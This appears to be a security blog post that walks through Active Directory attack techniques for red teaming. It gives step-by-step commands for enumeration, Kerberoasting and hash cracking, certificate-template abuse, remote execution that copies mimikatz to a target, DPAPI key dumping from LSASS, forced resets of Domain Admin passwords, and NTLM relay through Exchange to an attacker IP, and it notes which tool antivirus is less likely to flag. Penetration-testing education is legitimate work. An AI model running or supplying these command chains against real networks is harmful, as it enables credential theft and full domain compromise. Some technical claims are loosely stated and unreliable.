Listen to this Post

Introduction:
Active Directory (AD) remains the crown jewel for attackers and defenders alike in corporate networks. Mastering its intricacies is paramount for effective penetration testing and red team operations, moving beyond basic enumeration to advanced privilege escalation and lateral movement techniques that mimic sophisticated adversaries.
Learning Objectives:
- Understand and execute critical AD enumeration commands to map the attack surface.
- Learn to exploit common AD misconfigurations like Kerberoasting and ACL abuses.
- Gain practical knowledge for attacking core AD services and infrastructure, including AD CS and DPAPI.
You Should Know:
1. Foundational AD Enumeration with PowerView
Before exploitation comes discovery. PowerView is an essential PowerShell tool for querying AD in an offensive context.
Import PowerView Import-Module .\PowerView.ps1 Get the current domain Get-NetDomain Enumerate all domain users Get-NetUser | select samaccountname, description, pwdlastset, logoncount Find all domain computers Get-NetComputer | select name, operatingsystem Map domain trusts Get-NetDomainTrust
Step-by-step guide:
- Download the PowerView script and load it into your PowerShell session, often bypassing execution policy for this purpose.
- Start by running `Get-NetDomain` to confirm your context and view basic domain information.
- Use `Get-NetUser` to list all user accounts. Filter for service accounts (
serviceprincipalname) or those with pre-Windows 2000 passwords (useraccountcontrol).
4. `Get-NetComputer` helps identify potential targets for lateral movement, focusing on servers and workstations.
5. `Get-NetDomainTrust` reveals trust relationships between domains, which can be leveraged to pivot into other security realms.
2. Kerberoasting: Cracking Service Account Passwords
Kerberoasting attacks target service accounts in AD, which use SPNs (Service Principal Names). Attackers request encrypted service tickets that can be cracked offline to recover plaintext passwords.
Request Kerberoastable tickets for all users with SPNs Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat HashCat Alternative using Rubeus .\Rubeus.exe kerberoast /stats /outfile:hashes.txt
Step-by-step guide:
- From a domain-joined machine, use PowerView to find all user accounts with an SPN set using
Get-DomainUser -SPN. - Pipe the results to `Get-DomainSPNTicket` to request a Ticket Granting Service (TGS) ticket for each. The `OutputFormat HashCat` flag prepares the hash for cracking.
- Alternatively, use Rubeus, a powerful C tool, to perform the same attack with additional features like listing statistics.
- Take the extracted hash and feed it into a password cracking tool like Hashcat (
hashcat -m 13100 hashes.txt wordlist.txt) or John the Ripper to attempt to recover the plaintext password.
3. Exploiting AD Certificate Services (AD CS)
Misconfigured AD CS templates can allow a low-privilege user to request a certificate that grants them domain admin privileges, a technique popularized by the PetitPotam and ESC8 vulnerabilities.
Using Certipy to find vulnerable templates and request a certificate certipy find 'corp.local/[email protected]' -dc-ip 10.0.0.1 -scheme ldaps Request a certificate based on a vulnerable template certipy req 'corp.local/[email protected]' -ca 'CORP-CA' -template 'VulnerableTemplate' -target 'dc.corp.local'
Step-by-step guide:
- Use a tool like Certipy to enumerate the Certificate Authority (CA) and available templates. The `find` command will list templates where low-privileged users have enrollment rights.
- Identify templates that allow enrollment for Domain Computers or Authenticated Users and have the `ENROLLEE_SUPPLIES_SUBJECT` flag or similar misconfigurations.
- Request a certificate using the `req` command, specifying the vulnerable template.
- Use the resulting certificate (a `.pfx` file) with Certipy again to authenticate and retrieve the NT hash of the target computer account, effectively granting you elevated access.
4. Lateral Movement with WMI and PowerShell Remoting
Lateral movement is key to pivoting across a network. Windows Management Instrumentation (WMI) and PowerShell Remoting (WinRM) are common methods.
Execute a command on a remote host via WMI
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami" -ComputerName "TARGET-PC"
Create a PSSession for persistent remote access
$sess = New-PSSession -ComputerName "TARGET-PC"
Invoke-Command -Session $sess -ScriptBlock { whoami }
Copy a file to the remote host
Copy-Item "C:\tools\mimikatz.exe" -Destination "C:\temp\" -ToSession $sess
Step-by-step guide:
- Ensure you have valid credentials with local admin rights on the target machine.
- Use `Invoke-WmiMethod` to create a process remotely. This is a one-off command execution.
- For a more interactive session, use `New-PSSession` to establish a PowerShell session. This allows you to run multiple commands in the context of that session.
- With an active PSSession, you can upload tools using `Copy-Item` with the `-ToSession` parameter, enabling further exploitation on the remote host.
5. DPAPI Master Key Extraction
The Data Protection API (DPAPI) protects user data like passwords and browser cookies. As a privileged user, you can dump the DPAPI master keys to decrypt this data.
Using Mimikatz to dump DPAPI master keys mimikatz privilege::debug mimikatz sekurlsa::dpapi Using SharpDPAPI to dump master keys and vault credentials SharpDPAPI masterkeys SharpDPAPI vaults
Step-by-step guide:
- Gain Debug privileges on the target system (often requires local administrator access).
- Load Mimikatz and use the `sekurlsa::dpapi` command to extract the DPAPI master keys from the LSASS process memory. These keys are associated with currently logged-on users.
- Alternatively, use a tool like SharpDPAPI, which is less likely to be flagged by antivirus. The `masterkeys` command will attempt to retrieve all accessible master keys.
- Once you have the master key, you can use it with other tools to decrypt specific DPAPI-protected files, such as Chrome browser logins or saved credentials in the Windows Vault.
6. Abusing ACLs for Privilege Escalation (ForceChangePassword)
Active Directory Access Control Lists (ACLs) can be misconfigured, granting standard users dangerous permissions over other users or groups.
Check for interesting ACLs on a user object
Get-DomainObjectAcl -Identity "TargetUser" | ? {$_.ActiveDirectoryRights -match "WriteProperty"} | select SecurityIdentifier, ActiveDirectoryRights
Check if the current user has the "ForceChangePassword" right on a privileged account
Get-DomainObjectAcl -Identity "DomainAdmin" | ? {$_.SecurityIdentifier -eq (Get-DomainUser -Identity "CurrentUser").objectsid} | select ObjectAceType, ActiveDirectoryRights
Use the built-in method to reset the password
$cred = ConvertTo-SecureString "NewPass123!" -AsPlainText -Force
Set-DomainUserPassword -Identity "DomainAdmin" -AccountPassword $cred
Step-by-step guide:
- Use PowerView’s `Get-DomainObjectAcl` to enumerate the ACLs of a high-value target, like a Domain Admin.
- Filter the results to see if your current user’s SID has any write permissions, particularly
ForceChangePassword. - If the right is present, you can use the `Set-DomainUserPassword` cmdlet to reset the target user’s password without knowing their current one.
- Immediately use the new password with `RunAs` or a tool like `psexec` to gain access as that user.
7. Exchange Server Exploitation
Microsoft Exchange servers are high-value targets, often holding critical communications and providing a large attack surface.
Enumerating Exchange with Ruler (forging client Outlook rules) ruler --domain corp.local --username user --password pass abk dump Using PrivExchange to force a host to authenticate to you (NTLM Relay) python privexchange.py -ah attacker_ip -u user -p password -d domain.com dc.target.domain
Step-by-step guide:
- Ruler: This tool exploits the Exchange Web Services (EWS) API. Provide valid credentials and use the `abk dump` command to list any existing malicious rules. You can then add a rule to run a payload.
- PrivExchange: This attack tricks the Exchange server into authenticating to a machine you control. Run the script pointing to your attacker IP and the target Domain Controller.
- Simultaneously, run an NTLM Relay tool like `ntlmrelayx.py` from Impacket, configured to relay the Exchange server’s authentication to the Domain Controller on SMB or LDAPS.
- If successful, the relay can grant you high privileges on the DC, such as the ability to DCSync and extract the entire NTDS.dit password database.
What Undercode Say:
- The attack surface of a default Active Directory environment is vast, and mastery lies in chaining low-impact findings into a full domain compromise.
- Modern red teaming has shifted from pure technical exploitation to abusing business logic and intended features, as seen with AD CS and ACL abuses.
- Analysis: The professional landscape for offensive security is no longer about zero-days alone. The most consistent path to domain dominance is through a deep understanding of Active Directory’s complex interplay of services, permissions, and certificates. The techniques outlined—from Kerberoasting to AD CS exploitation—highlight that misconfigurations and over-permissive settings are the rule, not the exception. A successful red teamer acts like a forensic auditor, meticulously following the trail of permissions and tickets to find the one misstep that unlocks the entire network. Defenders must therefore focus on hardening these core identity services with the same rigor applied to network perimeters, implementing principles of least privilege and continuous monitoring for anomalous ticket requests and permission changes.
Prediction:
The evolution of AD attacks will increasingly leverage AI for automated attack path analysis, identifying complex privilege escalation chains that would be missed by human operators. Furthermore, as cloud identity systems like Entra ID (Azure AD) become more integrated with on-premises AD, we will see a rise in hybrid attack methodologies that pivot from cloud-app tokens to on-premises domain admin, forcing a convergence of red team skills across both environments. The principle of “assume breach” will mandate that defensive strategies focus not just on prevention but on detecting and responding to these intricate, multi-stage AD attacks in real-time.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Jean Hurtado – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


